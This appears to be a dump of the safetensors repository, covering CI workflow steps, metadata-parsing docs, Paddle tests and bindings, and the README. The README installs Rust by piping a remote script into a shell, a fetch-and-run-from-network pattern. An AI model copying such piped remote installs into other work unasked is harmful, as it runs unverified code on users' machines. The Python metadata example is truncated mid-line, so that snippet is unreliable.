152 | - name: Run tests (freethreaded)
153 | if: matrix.version.arch == 'x64-freethreaded'
154 | run: |
155 | cargo test
156 | pip install ".[testingfree]"
157 | pip install pytest numpy
158 | pytest -sv tests/test_pt*
159 | pytest -sv tests/test_simple.py
160 |
161 | test_s390x_big_endian:
162 | runs-on: ubuntu-latest
163 | permissions:
164 | contents: write
165 | packages: write
166 | name: Test bigendian - S390X
167 | steps:
168 | - uses: actions/checkout@v6
169 | - name: Set up QEMU
170 | uses: docker/setup-qemu-action@v3
171 | - name: Set up Docker Buildx
172 | uses: docker/setup-buildx-action@v3
173 | - name: Can push to GHCR?
174 | id: canpush
175 | shell: bash
176 | run: |
177 | echo "value=${{ github.event.pull_request.head.repo.fork == false }}" >> "$GITHUB_OUTPUT"
178 | - name: Docker meta
179 | id: meta
180 | uses: docker/metadata-action@v5
181 | with:
182 | # list of Docker images to use as base name for tags
183 | images: |
184 | ghcr.io/huggingface/safetensors/s390x
185 | # generate Docker tags based on the following events/attributes
186 | tags: |
187 | type=schedule
188 | type=ref,event=branch
189 | type=ref,event=pr
190 | type=semver,pattern={{version}}
191 | type=semver,pattern={{major}}.{{minor}}
192 | type=semver,pattern={{major}}
193 | type=sha
194 | - name: Login to Registry
195 | if: steps.canpush.outputs.value == 'true'
196 | uses: docker/login-action@v3
197 | with:
198 | registry: ghcr.io
199 | username: ${{ github.actor }}
200 | password: ${{ secrets.GITHUB_TOKEN }}
201 | - name: Test big endian
202 | uses: docker/build-push-action@v6
203 | with:
204 | platforms: linux/s390x
205 | file: Dockerfile.s390x.test
206 | tags: ${{ steps.meta.outputs.tags }}
207 | labels: ${{ steps.meta.outputs.labels }}
208 | cache-from: ${{ steps.canpush.outputs.value == 'true' && 'type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max' || 'type=gha' }}
209 | cache-to: ${{ steps.canpush.outputs.value == 'true' && 'type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max' || 'type=gha' }}
210 | push: ${{ steps.canpush.outputs.value == 'true' }}
211 |
--------------------------------------------------------------------------------
/docs/source/metadata_parsing.mdx:
--------------------------------------------------------------------------------
1 | # Metadata Parsing
2 |
3 | Given the simplicity of the format, it's very simple and efficient to fetch and parse metadata about Safetensors weights – i.e. the list of tensors, their types, and their shapes or numbers of parameters – using small [(Range) HTTP requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests).
4 |
5 | This parsing has been implemented in JS in [`huggingface.js`](https://huggingface.co/docs/huggingface.js/main/en/hub/modules#parsesafetensorsmetadata) (sample code follows below), but it would be similar in any language.
6 |
7 | ## Example use case
8 |
9 | There can be many potential use cases. For instance, we use it on the HuggingFace Hub to display info about models which have safetensors weights:
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 | ## Usage
22 |
23 |
24 |
25 |
26 | From [🤗 Hub](hf.co/models), you can get metadata of a model with [HTTP range requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests) instead of downloading the entire safetensors file with all the weights. In this example python script below (you can use any language that has HTTP requests support), we are parsing metadata of [gpt2](https://huggingface.co/gpt2/blob/main/model.safetensors).
27 |
28 | ```python
29 | import requests # pip install requests
30 | import struct
31 |
32 | def parse_single_file(url):
33 | # Fetch the first 8 bytes of the file
34 | headers = {'Range': 'bytes=0-7'}
35 | response = requests.get(url, headers=headers)
36 | # Interpret the bytes as a little-endian unsigned 64-bit integer
37 | length_of_header = struct.unpack('
60 |
61 |
62 | Using [`huggingface.js`](https://huggingface.co/docs/huggingface.js)
63 |
64 | ```ts
65 | import { parseSafetensorsMetadata } from "@huggingface/hub";
66 |
67 | const info = await parseSafetensorsMetadata({
68 | repo: { type: "model", name: "bigscience/bloom" },
69 | });
70 |
71 | console.log(info)
72 | // {
73 | // sharded: true,
74 | // index: {
75 | // metadata: { total_size: 352494542848 },
76 | // weight_map: {
77 | // 'h.0.input_layernorm.bias': 'model_00002-of-00072.safetensors',
78 | // ...
79 | // }
80 | // },
81 | // headers: {
82 | // __metadata__: {'format': 'pt'},
83 | // 'h.2.attn.c_attn.weight': {'dtype': 'F32', 'shape': [768, 2304], 'data_offsets': [541012992, 548090880]},
84 | // ...
85 | // }
86 | // }
87 | ```
88 |
89 | Depending on whether the safetensors weights are sharded into multiple files or not, the output of the call above will be:
90 |
91 | ```ts
92 | export type SafetensorsParseFromRepo =
93 | | {
94 | sharded: false;
95 | header: SafetensorsFileHeader;
96 | }
97 | | {
98 | sharded: true;
99 | index: SafetensorsIndexJson;
100 | headers: SafetensorsShardedHeaders;
101 | };
102 | ```
103 |
104 | where the underlying `types` are the following:
105 |
106 | ```ts
107 | type FileName = string;
108 |
109 | type TensorName = string;
110 | type Dtype = "F64" | "F32" | "F16" | "BF16" | "I64" | "I32" | "I16" | "I8" | "U8" | "BOOL";
111 |
112 | interface TensorInfo {
113 | dtype: Dtype;
114 | shape: number[];
115 | data_offsets: [number, number];
116 | }
117 |
118 | type SafetensorsFileHeader = Record & {
119 | __metadata__: Record;
120 | };
121 |
122 | interface SafetensorsIndexJson {
123 | weight_map: Record;
124 | }
125 |
126 | export type SafetensorsShardedHeaders = Record;
127 | ```
128 |
129 |
130 |
131 | [`huggingface_hub`](https://huggingface.co/docs/huggingface_hub) provides a Python API to parse safetensors metadata.
132 | Use [`get_safetensors_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.get_safetensors_metadata) to get all safetensors metadata of a model.
133 | Depending on if the model is sharded or not, one or multiple safetensors files will be parsed.
134 |
135 | ```python
136 | >>> from huggingface_hub import get_safetensors_metadata
137 |
138 | # Parse repo with single weights file
139 | >>> metadata = get_safetensors_metadata("bigscience/bloomz-560m")
140 | >>> metadata
141 | SafetensorsRepoMetadata(
142 | metadata=None,
143 | sharded=False,
144 | weight_map={'h.0.input_layernorm.bias': 'model.safetensors', ...},
145 | files_metadata={'model.safetensors': SafetensorsFileMetadata(...)}
146 | )
147 | >>> metadata.files_metadata["model.safetensors"].metadata
148 | {'format': 'pt'}
149 |
150 | # Parse repo with sharded model (i.e. multiple weights files)
151 | >>> metadata = get_safetensors_metadata("bigscience/bloom")
152 | Parse safetensors files: 100%|██████████████████████████████████████████| 72/72 [00:12<00:00, 5.78it/s]
153 | >>> metadata
154 | SafetensorsRepoMetadata(metadata={'total_size': 352494542848}, sharded=True, weight_map={...}, files_metadata={...})
155 | >>> len(metadata.files_metadata)
156 | 72 # All safetensors files have been fetched
157 |
158 | # Parse repo that is not a safetensors repo
159 | >>> get_safetensors_metadata("runwayml/stable-diffusion-v1-5")
160 | NotASafetensorsRepoError: 'runwayml/stable-diffusion-v1-5' is not a safetensors repo. Couldn't find 'model.safetensors.index.json' or 'model.safetensors' files.
161 | ```
162 |
163 | To parse the metadata of a single safetensors file, use [`parse_safetensors_file_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.parse_safetensors_file_metadata).
164 |
165 |
166 |
167 |
168 | ## Example output
169 |
170 | For instance, here are the number of params per dtype for a few models on the HuggingFace Hub. Also see [this issue](https://github.com/huggingface/safetensors/issues/44) for more examples of usage.
171 |
172 | model | safetensors | params
173 | --- | --- | ---
174 | [gpt2](https://huggingface.co/gpt2?show_tensors=true) | single-file | { 'F32' => 137022720 }
175 | [roberta-base](https://huggingface.co/roberta-base?show_tensors=true) | single-file | { 'F32' => 124697433, 'I64' => 514 }
176 | [Jean-Baptiste/camembert-ner](https://huggingface.co/Jean-Baptiste/camembert-ner?show_tensors=true) | single-file | { 'F32' => 110035205, 'I64' => 514 }
177 | [roberta-large](https://huggingface.co/roberta-large?show_tensors=true) | single-file | { 'F32' => 355412057, 'I64' => 514 }
178 | [distilbert-base-german-cased](https://huggingface.co/distilbert-base-german-cased?show_tensors=true) | single-file | { 'F32' => 67431550 }
179 | [EleutherAI/gpt-neox-20b](https://huggingface.co/EleutherAI/gpt-neox-20b?show_tensors=true) | sharded | { 'F16' => 20554568208, 'U8' => 184549376 }
180 | [bigscience/bloom-560m](https://huggingface.co/bigscience/bloom-560m?show_tensors=true) | single-file | { 'F16' => 559214592 }
181 | [bigscience/bloom](https://huggingface.co/bigscience/bloom?show_tensors=true) | sharded | { 'BF16' => 176247271424 }
182 | [bigscience/bloom-3b](https://huggingface.co/bigscience/bloom-3b?show_tensors=true) | single-file | { 'F16' => 3002557440 }
183 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_paddle_comparison.py:
--------------------------------------------------------------------------------
1 | import unittest
2 | import numpy as np
3 |
4 | from safetensors import safe_open
5 |
6 |
7 | try:
8 | import paddle
9 | from safetensors.paddle import load_file, save_file, save, load
10 |
11 | HAS_PADDLE = True
12 | except ImportError:
13 | HAS_PADDLE = False
14 |
15 |
16 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available")
17 | class SafeTestCase(unittest.TestCase):
18 | def setUp(self):
19 | data = {
20 | "test": paddle.zeros((1024, 1024), dtype=paddle.float32),
21 | "test2": paddle.zeros((1024, 1024), dtype=paddle.float32),
22 | "test3": paddle.zeros((1024, 1024), dtype=paddle.float32),
23 | "test4": paddle.zeros((1024, 1024), dtype=paddle.complex64),
24 | }
25 | self.paddle_filename = "./tests/data/paddle_load.pdparams"
26 | self.sf_filename = "./tests/data/paddle_load.safetensors"
27 |
28 | paddle.save(data, self.paddle_filename)
29 | save_file(data, self.sf_filename)
30 |
31 | @unittest.expectedFailure
32 | def test_zero_sized(self):
33 | # This fails because paddle wants initialized tensor before
34 | # sending to numpy
35 | data = {
36 | "test": paddle.zeros((2, 0), dtype=paddle.float32),
37 | }
38 | local = "./tests/data/out_safe_paddle_mmap_small2.safetensors"
39 | save_file(data, local)
40 | reloaded = load_file(local)
41 | self.assertTrue(paddle.equal(data["test"], reloaded["test"]))
42 |
43 | def test_deserialization_safe(self):
44 | weights = load_file(self.sf_filename)
45 |
46 | paddle_weights = paddle.load(self.paddle_filename)
47 | for k, v in weights.items():
48 | tv = paddle_weights[k]
49 | self.assertTrue(np.allclose(v, tv))
50 |
51 |
52 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available")
53 | class WithOpenCase(unittest.TestCase):
54 | def test_paddle_tensor_cpu(self):
55 | A = paddle.randn((10, 5))
56 | tensors = {
57 | "a": A,
58 | }
59 | save_file(tensors, "./tensor_paddle.safetensors")
60 |
61 | # Now loading cpu
62 | with safe_open(
63 | "./tensor_paddle.safetensors", framework="paddle", device="cpu"
64 | ) as f:
65 | tensor = f.get_tensor("a")
66 | self.assertEqual(list(tensor.shape), [10, 5])
67 | assert paddle.allclose(tensor, A).item()
68 | assert not tensor.place.is_gpu_place()
69 |
70 | def test_paddle_tensor_gpu(self):
71 | A = paddle.randn((10, 5))
72 | tensors = {
73 | "a": A,
74 | }
75 | save_file(tensors, "./tensor_paddle.safetensors")
76 | # Now loading gpu
77 | with safe_open(
78 | "./tensor_paddle.safetensors", framework="paddle", device="cuda"
79 | ) as f:
80 | tensor = f.get_tensor("a")
81 | self.assertEqual(list(tensor.shape), [10, 5])
82 | assert paddle.allclose(tensor, A).item()
83 | assert tensor.place.is_gpu_place()
84 |
85 | def test_paddle_slice_cpu(self):
86 | A = paddle.randn((10, 5))
87 | tensors = {
88 | "a": A,
89 | }
90 | save_file(tensors, "./slice_paddle.safetensors")
91 |
92 | # Now loading
93 | with safe_open(
94 | "./slice_paddle.safetensors", framework="paddle", device="cpu"
95 | ) as f:
96 | slice_ = f.get_slice("a")
97 | tensor = slice_[:]
98 | self.assertEqual(list(tensor.shape), [10, 5])
99 | assert paddle.allclose(tensor, A).item()
100 | assert not tensor.place.is_gpu_place()
101 |
102 | tensor = slice_[tuple()]
103 | self.assertEqual(list(tensor.shape), [10, 5])
104 | assert paddle.allclose(tensor, A).item()
105 | assert not tensor.place.is_gpu_place()
106 |
107 | tensor = slice_[:2]
108 | self.assertEqual(list(tensor.shape), [2, 5])
109 | assert paddle.allclose(tensor, A[:2]).item()
110 | assert not tensor.place.is_gpu_place()
111 |
112 | tensor = slice_[:, :2]
113 | self.assertEqual(list(tensor.shape), [10, 2])
114 | assert paddle.allclose(tensor, A[:, :2]).item()
115 | assert not tensor.place.is_gpu_place()
116 |
117 | tensor = slice_[0, :2]
118 | self.assertEqual(list(tensor.shape), [2])
119 | assert paddle.allclose(tensor, A[0, :2]).item()
120 | assert not tensor.place.is_gpu_place()
121 |
122 | tensor = slice_[2:, 0]
123 | self.assertEqual(list(tensor.shape), [8])
124 | assert paddle.allclose(tensor, A[2:, 0]).item()
125 | assert not tensor.place.is_gpu_place()
126 |
127 | tensor = slice_[2:, 1]
128 | self.assertEqual(list(tensor.shape), [8])
129 | assert paddle.allclose(tensor, A[2:, 1]).item()
130 | assert not tensor.place.is_gpu_place()
131 |
132 | tensor = slice_[2:, -1]
133 | self.assertEqual(list(tensor.shape), [8])
134 | assert paddle.allclose(tensor, A[2:, -1]).item()
135 | assert not tensor.place.is_gpu_place()
136 |
137 | tensor = slice_[list()]
138 | self.assertEqual(list(tensor.shape), [0, 5])
139 | assert paddle.allclose(tensor, A[list()]).item()
140 | assert not tensor.place.is_gpu_place()
141 |
142 | def test_paddle_slice_gpu(self):
143 | A = paddle.randn((10, 5))
144 | tensors = {
145 | "a": A,
146 | }
147 | save_file(tensors, "./slice_paddle.safetensors")
148 |
149 | # Now loading
150 | with safe_open(
151 | "./slice_paddle.safetensors", framework="paddle", device="cuda"
152 | ) as f:
153 | slice_ = f.get_slice("a")
154 | tensor = slice_[:]
155 | self.assertEqual(list(tensor.shape), [10, 5])
156 | assert paddle.allclose(tensor, A).item()
157 | assert tensor.place.is_gpu_place()
158 |
159 | tensor = slice_[tuple()]
160 | self.assertEqual(list(tensor.shape), [10, 5])
161 | assert paddle.allclose(tensor, A).item()
162 | assert tensor.place.is_gpu_place()
163 |
164 | tensor = slice_[:2]
165 | self.assertEqual(list(tensor.shape), [2, 5])
166 | assert paddle.allclose(tensor, A[:2]).item()
167 | assert tensor.place.is_gpu_place()
168 |
169 | tensor = slice_[:, :2]
170 | self.assertEqual(list(tensor.shape), [10, 2])
171 | assert paddle.allclose(tensor, A[:, :2]).item()
172 | assert tensor.place.is_gpu_place()
173 |
174 | tensor = slice_[0, :2]
175 | self.assertEqual(list(tensor.shape), [2])
176 | assert paddle.allclose(tensor, A[0, :2]).item()
177 | assert tensor.place.is_gpu_place()
178 |
179 | tensor = slice_[2:, 0]
180 | self.assertEqual(list(tensor.shape), [8])
181 | assert paddle.allclose(tensor, A[2:, 0]).item()
182 | assert tensor.place.is_gpu_place()
183 |
184 | tensor = slice_[2:, 1]
185 | self.assertEqual(list(tensor.shape), [8])
186 | assert paddle.allclose(tensor, A[2:, 1]).item()
187 | assert tensor.place.is_gpu_place()
188 |
189 | tensor = slice_[2:, -1]
190 | self.assertEqual(list(tensor.shape), [8])
191 | assert paddle.allclose(tensor, A[2:, -1]).item()
192 | assert tensor.place.is_gpu_place()
193 |
194 | tensor = slice_[list()]
195 | self.assertEqual(list(tensor.shape), [0, 5])
196 | assert paddle.allclose(tensor, A[list()]).item()
197 | assert tensor.place.is_gpu_place()
198 |
199 |
200 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available")
201 | class SaveLoadCase(unittest.TestCase):
202 | def test_in_memory(self):
203 | data = {
204 | "test": paddle.zeros((2, 2), dtype=paddle.float32),
205 | }
206 | binary = save(data)
207 | self.assertEqual(
208 | binary,
209 | # Spaces are for forcing the alignment.
210 | b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"F32","shape":[2,2],"data_offsets":[0,16]}} '
211 | b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
212 | )
213 | reloaded = load(binary)
214 | out = paddle.equal(data["test"], reloaded["test"])
215 | self.assertTrue(paddle.all(out))
216 |
217 | def test_save_load_cpu(self):
218 | if paddle.__version__ >= "3.2.0":
219 | self.dtype = paddle.bfloat16
220 | else:
221 | self.dtype = paddle.float32
222 | data = {
223 | "test": paddle.randn((2, 2), dtype=self.dtype),
224 | }
225 | self.sf_filename = "./tests/data/paddle_save_load_cpu.safetensors"
226 | save_file(data, self.sf_filename)
227 | reloaded = load(open(self.sf_filename, "rb").read())
228 | out = paddle.equal(data["test"], reloaded["test"])
229 | self.assertTrue(paddle.all(out))
230 |
231 | def test_odd_dtype(self):
232 | if paddle.__version__ >= "3.2.0":
233 | data = {
234 | "test1": paddle.randn((2, 2), dtype=paddle.bfloat16),
235 | "test2": paddle.randn((2, 2), dtype=paddle.float32),
236 | }
237 | self.sf_filename = "./tests/data/paddle_save_load_type.safetensors"
238 | save_file(data, self.sf_filename)
239 | reloaded = load_file(self.sf_filename)
240 | self.assertTrue(paddle.all(paddle.equal(data["test1"], reloaded["test1"])))
241 | self.assertEqual(reloaded["test1"].dtype, paddle.bfloat16)
242 | self.assertTrue(paddle.all(paddle.equal(data["test2"], reloaded["test2"])))
243 | self.assertEqual(reloaded["test2"].dtype, paddle.float32)
244 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/paddle.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | from typing import Any, Dict, List, Optional, Union
4 |
5 | import numpy as np
6 | import paddle
7 |
8 | from safetensors import numpy, deserialize, safe_open, serialize, serialize_file
9 |
10 |
11 | def save(
12 | tensors: Dict[str, paddle.Tensor], metadata: Optional[Dict[str, str]] = None
13 | ) -> bytes:
14 | """
15 | Saves a dictionary of tensors into raw bytes in safetensors format.
16 |
17 | Args:
18 | tensors (`Dict[str, paddle.Tensor]`):
19 | The incoming tensors. Tensors need to be contiguous and dense.
20 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
21 | Optional text only metadata you might want to save in your header.
22 | For instance it can be useful to specify more about the underlying
23 | tensors. This is purely informative and does not affect tensor loading.
24 |
25 | Returns:
26 | `bytes`: The raw bytes representing the format
27 |
28 | Example:
29 |
30 | ```python
31 | from safetensors.paddle import save
32 | import paddle
33 |
34 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))}
35 | byte_data = save(tensors)
36 | ```
37 | """
38 | keep_references_alive = []
39 | serialized = serialize(_flatten(tensors, keep_references_alive), metadata=metadata)
40 | result = bytes(serialized)
41 | return result
42 |
43 |
44 | def save_file(
45 | tensors: Dict[str, paddle.Tensor],
46 | filename: Union[str, os.PathLike],
47 | metadata: Optional[Dict[str, str]] = None,
48 | ) -> None:
49 | """
50 | Saves a dictionary of tensors into raw bytes in safetensors format.
51 |
52 | Args:
53 | tensors (`Dict[str, paddle.Tensor]`):
54 | The incoming tensors. Tensors need to be contiguous and dense.
55 | filename (`str`, or `os.PathLike`)):
56 | The filename we're saving into.
57 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
58 | Optional text only metadata you might want to save in your header.
59 | For instance it can be useful to specify more about the underlying
60 | tensors. This is purely informative and does not affect tensor loading.
61 |
62 | Returns:
63 | `None`
64 |
65 | Example:
66 |
67 | ```python
68 | from safetensors.paddle import save_file
69 | import paddle
70 |
71 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))}
72 | save_file(tensors, "model.safetensors")
73 | ```
74 | """
75 | keep_references_alive = []
76 | serialize_file(
77 | _flatten(tensors, keep_references_alive), filename, metadata=metadata
78 | )
79 |
80 |
81 | def load(data: bytes, device: str = "cpu") -> Dict[str, paddle.Tensor]:
82 | """
83 | Loads a safetensors file into paddle format from pure bytes.
84 |
85 | Args:
86 | data (`bytes`):
87 | The content of a safetensors file
88 |
89 | Returns:
90 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` on cpu
91 |
92 | Example:
93 |
94 | ```python
95 | from safetensors.paddle import load
96 |
97 | file_path = "./my_folder/bert.safetensors"
98 | with open(file_path, "rb") as f:
99 | data = f.read()
100 |
101 | loaded = load(data)
102 | ```
103 | """
104 | if paddle.__version__ >= "3.2.0":
105 | flat = deserialize(data)
106 | return _view2paddle(flat, device)
107 | else:
108 | flat = numpy.load(data)
109 | return _np2paddle(flat, device)
110 |
111 |
112 | def load_file(
113 | filename: Union[str, os.PathLike], device="cpu"
114 | ) -> Dict[str, paddle.Tensor]:
115 | """
116 | Loads a safetensors file into paddle format.
117 |
118 | Args:
119 | filename (`str`, or `os.PathLike`)):
120 | The name of the file which contains the tensors
121 | device (`Union[Dict[str, any], str]`, *optional*, defaults to `cpu`):
122 | The device where the tensors need to be located after load.
123 | available options are all regular paddle device locations
124 |
125 | Returns:
126 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor`
127 |
128 | Example:
129 |
130 | ```python
131 | from safetensors.paddle import load_file
132 |
133 | file_path = "./my_folder/bert.safetensors"
134 | loaded = load_file(file_path)
135 | ```
136 | """
137 | result = {}
138 | if paddle.__version__ >= "3.2.0":
139 | with safe_open(filename, framework="paddle", device=device) as f:
140 | for k in f.offset_keys():
141 | result[k] = f.get_tensor(k)
142 | else:
143 | flat = numpy.load_file(filename)
144 | result = _np2paddle(flat, device)
145 | return result
146 |
147 |
148 | def _np2paddle(
149 | numpy_dict: Dict[str, np.ndarray], device: str = "cpu"
150 | ) -> Dict[str, paddle.Tensor]:
151 | for k, v in numpy_dict.items():
152 | numpy_dict[k] = paddle.to_tensor(v, place=device)
153 | return numpy_dict
154 |
155 |
156 | def _paddle2np(paddle_dict: Dict[str, paddle.Tensor]) -> Dict[str, np.array]:
157 | for k, v in paddle_dict.items():
158 | paddle_dict[k] = v.detach().cpu().numpy()
159 | return paddle_dict
160 |
161 |
162 | _SIZE = {
163 | paddle.int64: 8,
164 | paddle.float32: 4,
165 | paddle.int32: 4,
166 | paddle.bfloat16: 2,
167 | paddle.float16: 2,
168 | paddle.int16: 2,
169 | paddle.uint8: 1,
170 | paddle.int8: 1,
171 | paddle.bool: 1,
172 | paddle.float64: 8,
173 | paddle.float8_e4m3fn: 1,
174 | paddle.float8_e5m2: 1,
175 | paddle.complex64: 8,
176 | # XXX: These are not supported yet in paddle
177 | # paddle.uint64: 8,
178 | # paddle.uint32: 4,
179 | # paddle.uint16: 2,
180 | # paddle.float8_e8m0: 1,
181 | # paddle.float4_e2m1_x2: 1,
182 | }
183 |
184 | _TYPES = {
185 | "F64": paddle.float64,
186 | "F32": paddle.float32,
187 | "F16": paddle.float16,
188 | "BF16": paddle.bfloat16,
189 | "I64": paddle.int64,
190 | "I32": paddle.int32,
191 | "I16": paddle.int16,
192 | "I8": paddle.int8,
193 | "U8": paddle.uint8,
194 | "BOOL": paddle.bool,
195 | "F8_E4M3": paddle.float8_e4m3fn,
196 | "F8_E5M2": paddle.float8_e5m2,
197 | }
198 |
199 | NPDTYPES = {
200 | paddle.int64: np.int64,
201 | paddle.float32: np.float32,
202 | paddle.int32: np.int32,
203 | # XXX: This is ok because both have the same width
204 | paddle.bfloat16: np.float16,
205 | paddle.float16: np.float16,
206 | paddle.int16: np.int16,
207 | paddle.uint8: np.uint8,
208 | paddle.int8: np.int8,
209 | paddle.bool: bool,
210 | paddle.float64: np.float64,
211 | # XXX: This is ok because both have the same width and byteswap is a no-op anyway
212 | paddle.float8_e4m3fn: np.uint8,
213 | paddle.float8_e5m2: np.uint8,
214 | }
215 |
216 |
217 | def _getdtype(dtype_str: str) -> paddle.dtype:
218 | return _TYPES[dtype_str]
219 |
220 |
221 | def _view2paddle(safeview, device) -> Dict[str, paddle.Tensor]:
222 | result = {}
223 | for k, v in safeview:
224 | dtype = _getdtype(v["dtype"])
225 | if len(v["data"]) == 0:
226 | # Workaround because frombuffer doesn't accept zero-size tensors
227 | assert any(x == 0 for x in v["shape"])
228 | arr = paddle.empty(v["shape"], dtype=dtype)
229 | else:
230 | arr = paddle.base.core.frombuffer(v["data"], dtype).reshape(v["shape"])
231 | if device != "cpu":
232 | arr = arr.to(device)
233 | if sys.byteorder == "big":
234 | arr = paddle.to_tensor(arr.numpy().byteswap(inplace=False), place=device)
235 | result[k] = arr
236 |
237 | return result
238 |
239 |
240 | def _to_ndarray(tensor: paddle.Tensor, name: str):
241 | if not tensor.is_contiguous():
242 | raise ValueError(
243 | f"You are trying to save a non contiguous tensor: `{name}` which is not allowed. It either means you"
244 | " are trying to save tensors which are reference of each other in which case it's recommended to save"
245 | " only the full tensors, and reslice at load time, or simply call `.contiguous()` on your tensor to"
246 | " pack it before saving."
247 | )
248 | if not tensor.place.is_cpu_place():
249 | # Moving tensor to cpu before saving
250 | tensor = tensor.cpu()
251 |
252 | import ctypes
253 |
254 | # When shape is empty (scalar), np.prod returns a float
255 | # we need a int for the following calculations
256 | length = int(np.prod(tensor.shape).item())
257 | bytes_per_item = _SIZE[tensor.dtype]
258 |
259 | total_bytes = length * bytes_per_item
260 |
261 | ptr = tensor.data_ptr()
262 | if ptr == 0:
263 | return np.empty(
264 | 0
265 | ), 0 # XXX: bogus value we don't really care if we return a tensor here
266 | newptr = ctypes.cast(ptr, ctypes.POINTER(ctypes.c_ubyte))
267 | data = np.ctypeslib.as_array(newptr, (total_bytes,)) # no internal copy
268 | if sys.byteorder == "big":
269 | npdtype = NPDTYPES[tensor.dtype]
270 | # Not in place as that would potentially modify a live running model
271 | data = data.view(npdtype).byteswap(inplace=False)
272 | return data, tensor
273 |
274 |
275 | def _flatten(
276 | tensors: Dict[str, paddle.Tensor], keep_alive_buffer: List
277 | ) -> Dict[str, Dict[str, Any]]:
278 | if not isinstance(tensors, dict):
279 | raise ValueError(
280 | f"Expected a dict of [str, paddle.Tensor] but received {type(tensors)}"
281 | )
282 |
283 | for k, v in tensors.items():
284 | if not isinstance(v, paddle.Tensor):
285 | raise ValueError(
286 | f"Key `{k}` is invalid, expected paddle.Tensor but received {type(v)}"
287 | )
288 |
289 | flattened = {}
290 | for k, v in tensors.items():
291 | arr, tensor_ref = _to_ndarray(v, k)
292 | keep_alive_buffer.append((arr, tensor_ref))
293 | flattened[k] = {
294 | "dtype": str(v.dtype).split(".")[-1],
295 | "shape": v.shape,
296 | "data_ptr": arr.ctypes.data,
297 | "data_len": arr.nbytes,
298 | }
299 | return flattened
300 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 | Python
12 | [](https://pypi.org/pypi/safetensors/)
13 | [](https://huggingface.co/docs/safetensors/index)
14 | [](https://codecov.io/gh/huggingface/safetensors)
15 | [](https://pepy.tech/project/safetensors)
16 |
17 | Rust
18 | [](https://crates.io/crates/safetensors)
19 | [](https://docs.rs/safetensors/)
20 | [](https://codecov.io/gh/huggingface/safetensors)
21 | [](https://deps.rs/repo/github/huggingface/safetensors?path=safetensors)
22 |
23 | # safetensors
24 |
25 | ## Safetensors
26 |
27 | This repository implements a new simple format for storing tensors
28 | safely (as opposed to pickle) and that is still fast (zero-copy).
29 |
30 | ### Installation
31 | #### Pip
32 |
33 | You can install safetensors via the pip manager:
34 |
35 | ```bash
36 | pip install safetensors
37 | ```
38 |
39 | #### From source
40 |
41 | For the sources, you need Rust
42 |
43 | ```bash
44 | # Install Rust
45 | curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
46 | # Make sure it's up to date and using stable channel
47 | rustup update
48 | git clone https://github.com/huggingface/safetensors
49 | cd safetensors/bindings/python
50 | pip install setuptools_rust
51 | pip install -e .
52 | ```
53 |
54 | ### Getting started
55 |
56 | ```python
57 | import torch
58 | from safetensors import safe_open
59 | from safetensors.torch import save_file
60 |
61 | tensors = {
62 | "weight1": torch.zeros((1024, 1024)),
63 | "weight2": torch.zeros((1024, 1024))
64 | }
65 | save_file(tensors, "model.safetensors")
66 |
67 | tensors = {}
68 | with safe_open("model.safetensors", framework="pt", device="cpu") as f:
69 | for key in f.keys():
70 | tensors[key] = f.get_tensor(key)
71 | ```
72 |
73 | [Python documentation](https://huggingface.co/docs/safetensors/index)
74 |
75 |
76 | ### Format
77 |
78 | - 8 bytes: `N`, an unsigned little-endian 64-bit integer, containing the size of the header
79 | - N bytes: a JSON UTF-8 string representing the header.
80 | - The header data MUST begin with a `{` character (0x7B).
81 | - The header data MAY be trailing padded with whitespace (0x20).
82 | - The header is a dict like `{"TENSOR_NAME": {"dtype": "F16", "shape": [1, 16, 256], "data_offsets": [BEGIN, END]}, "NEXT_TENSOR_NAME": {...}, ...}`,
83 | - `data_offsets` point to the tensor data relative to the beginning of the byte buffer (i.e. not an absolute position in the file),
84 | with `BEGIN` as the starting offset and `END` as the one-past offset (so total tensor byte size = `END - BEGIN`).
85 | - A special key `__metadata__` is allowed to contain free form string-to-string map. Arbitrary JSON is not allowed, all values must be strings.
86 | - Rest of the file: byte-buffer.
87 |
88 | Notes:
89 | - Duplicate keys are disallowed. Not all parsers may respect this.
90 | - In general the subset of JSON is implicitly decided by `serde_json` for
91 | this library. Anything obscure might be modified at a later time, that odd ways
92 | to represent integer, newlines and escapes in utf-8 strings. This would only
93 | be done for safety concerns
94 | - Tensor values are not checked against, in particular NaN and +/-Inf could
95 | be in the file
96 | - Empty tensors (tensors with 1 dimension being 0) are allowed.
97 | They are not storing any data in the databuffer, yet retaining size in the header.
98 | They don't really bring a lot of values but are accepted since they are valid tensors
99 | from traditional tensor libraries perspective (torch, tensorflow, numpy, ..).
100 | - 0-rank Tensors (tensors with shape `[]`) are allowed, they are merely a scalar.
101 | - The byte buffer needs to be entirely indexed, and cannot contain holes. This prevents
102 | the creation of polyglot files.
103 | - Endianness: Little-endian.
104 | moment.
105 | - Order: 'C' or row-major.
106 | - Notes: Some smaller than 1 byte dtypes appeared, which make alignment tricky. Non traditional APIs might be required for those.
107 |
108 |
109 | ### Yet another format ?
110 |
